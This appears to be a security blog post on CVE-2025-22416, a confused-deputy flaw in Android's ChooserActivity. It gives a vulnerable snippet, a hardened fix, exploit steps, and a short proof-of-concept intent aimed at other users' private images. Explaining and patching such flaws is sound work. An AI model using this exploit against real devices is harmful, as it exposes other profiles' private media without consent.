A new Android security vulnerability, CVE-2025-22416, was recently disclosed, affecting the ChooserActivity component found in many Android versions. This vulnerability introduces a dangerous *confused deputy* scenario. In short, an unprivileged app can trick the system into letting it access private images belonging to other users—no special permissions, no user interaction needed. This post explains the vulnerability, provides real code snippets, references the original advisory, and demonstrates a proof-of-concept exploit.
What Is the ChooserActivity?
When you share something from an Android app—say, a picture to another app—you often see a dialog called the "chooser" to pick which app to share with. That's the ChooserActivity, and it’s part of core Android (usually in frameworks/base).
Vulnerability Details
In the vulnerable versions of Android, ChooserActivity.java incorrectly processes incoming intents. Specifically, it can inadvertently grant access to URIs (images, files, etc.) that belong to *other* users when it is invoked in the right way.
The Root Cause: Confused Deputy
A confused deputy occurs when a program unwittingly misuses its authority, performing actions on behalf of a less privileged actor. Here, ChooserActivity acts as that unwitting deputy.
From ChooserActivity.java:

@Override
protected void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
    Intent intent = getIntent();
    // ...
    Uri imageUri = intent.getParcelableExtra(Intent.EXTRA_STREAM);
    if (imageUri != null) {
        // Assumes the uri is safe, but in some cases, it's not!
        imageView.setImageURI(imageUri);
    }
}
The key problem? There is no effective check that the URI belongs to the current user, nor that the calling app itself has permission to read it. Because the activity runs with the system's privileges, the URI is resolved with those privileges rather than the caller's, and the normal restrictions are bypassed.
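As an added illustration (this is not the page's code and not the actual AOSP fix), the following hypothetical hardened version performs the two missing checks: the URI must belong to the launching app's own user, and the launching app, not the system, must hold read access to it. It assumes the class lives inside frameworks/base like ChooserActivity, so the framework-internal getLaunchedFromUid(), UserHandle.getUserId() and ContentProvider.getUserIdFromUri() helpers are visible, and it passes -1 as the pid to checkUriPermission() on the assumption that the uid is what the URI check keys on.

```java
import android.app.Activity;
import android.content.ContentProvider;
import android.content.ContentResolver;
import android.content.Intent;
import android.content.pm.PackageManager;
import android.net.Uri;
import android.os.Bundle;
import android.os.UserHandle;
import android.widget.ImageView;

/** Hypothetical hardened chooser (added example; not the AOSP fix). Lives in frameworks/base. */
public class HardenedChooserActivity extends Activity {
    private ImageView imageView; // assumed to be bound from the layout in the real class
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        Uri imageUri = getIntent().getParcelableExtra(Intent.EXTRA_STREAM);
        // Only act on the caller's behalf if the caller could have read the URI itself.
        if (imageUri != null && isUriReadableByLaunchingApp(imageUri)) {
            imageView.setImageURI(imageUri);
        } else {
            finish(); // confused-deputy guard: never resolve the URI with system privileges
        }
    }

    /** True only if the app that launched this activity may itself read {@code uri}. */
    private boolean isUriReadableByLaunchingApp(Uri uri) {
        // In onCreate the Binder calling identity is this (system) process, so
        // checkCallingUriPermission() would test our own rights; use the launcher's uid.
        int callerUid = getLaunchedFromUid(); // @hide, visible inside frameworks/base
        if (callerUid < 0 || UserHandle.isIsolated(callerUid)) {
            return false;
        }
        // Only content:// URIs go through providers and URI permission grants.
        if (!ContentResolver.SCHEME_CONTENT.equals(uri.getScheme())) {
            return false;
        }
        // Cross-user URIs encode their user as content://<userId>@authority/...;
        // an app in one profile must not reach media that belongs to another.
        int callerUserId = UserHandle.getUserId(callerUid);
        int uriUserId = ContentProvider.getUserIdFromUri(uri, callerUserId);
        if (uriUserId != callerUserId) {
            return false;
        }
        // Ask the permission system about the *caller's* read access, not ours.
        // pid -1: the uid is what the URI check keys on (assumption).
        return checkUriPermission(uri, -1, callerUid, Intent.FLAG_GRANT_READ_URI_PERMISSION)
                == PackageManager.PERMISSION_GRANTED;
    }
}
```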
Exploiting CVE-2025-22416: Step-by-step
Goal: Access (view or read) images or files belonging to another user on the device—despite privilege separation.
Prerequisites:
- Attacker app installed (no special permissions needed)
- Device with at least two user profiles (or work/personal profiles)
- Vulnerable Android version (check Android Security Bulletin)
Exploit Idea
1. Craft a malicious intent that references a file/image owned by a target user profile, using a content URI (e.g., content://com.android.providers.media.documents/document/image:100)
2. Send the intent to the ChooserActivity, requesting it to handle the URI. The system, running as system_user, uses its *own* privileges to resolve and display the image.
3. Observe the result—the attacker's app receives access to the image or is able to view it in the chooser.
Below is a simplified malicious app snippet:
Intent intent = new Intent(Intent.ACTION_SEND);
String targetUserImageUri = "content://com.android.providers.media.documents/document/image:100";
// Replace with actual target user's URI
intent.setType("image/*");
intent.putExtra(Intent.EXTRA_STREAM, Uri.parse(targetUserImageUri));
intent.setComponent(new ComponentName("com.android.systemui", "com.android.internal.app.ChooserActivity"));
// Start as a new task - *usually needs to be a system intent, but some systems expose ChooserActivity*
startActivity(intent);
*Note:* On newer Android versions or properly patched systems, this direct call may be blocked—*the vulnerability exists due to incomplete checking in older implementations*.
No User Interaction Required
Unlike many privilege escalation exploits, no user interaction is needed—the system's own intent handling does the work, so long as the target URI is known or guessable.
Impact
- File Disclosure: The attacker can access images, videos, or any other data referenced by the URI from other user profiles.
- Local Escalation of Privilege: The attacker app jumps privilege boundaries, violating Android's multi-user security design.
Official References
- Android Security Bulletin, June 2025
- National Vulnerability Database (CVE-2025-22416)
- Choosers and Intent Filters in Android Documentation
Conclusion
CVE-2025-22416 is a prime example of how easily a confused deputy can break security barriers, especially in a complex system like Android where components run at different privilege levels. Anyone maintaining custom ROMs, Android forks, or third-party Android distributions should double-check for this patch, as the bug provides a rare, *silent* escalation path requiring nothing from users.
*If you find security bugs in Android, report them here. Developers should always validate URIs and check the user context when handling incoming content through intents. Stay safe, and patch early!*
Timeline
Published on: 09/02/2025 23:15:33 UTC
Last modified on: 09/04/2025 16:40:02 UTC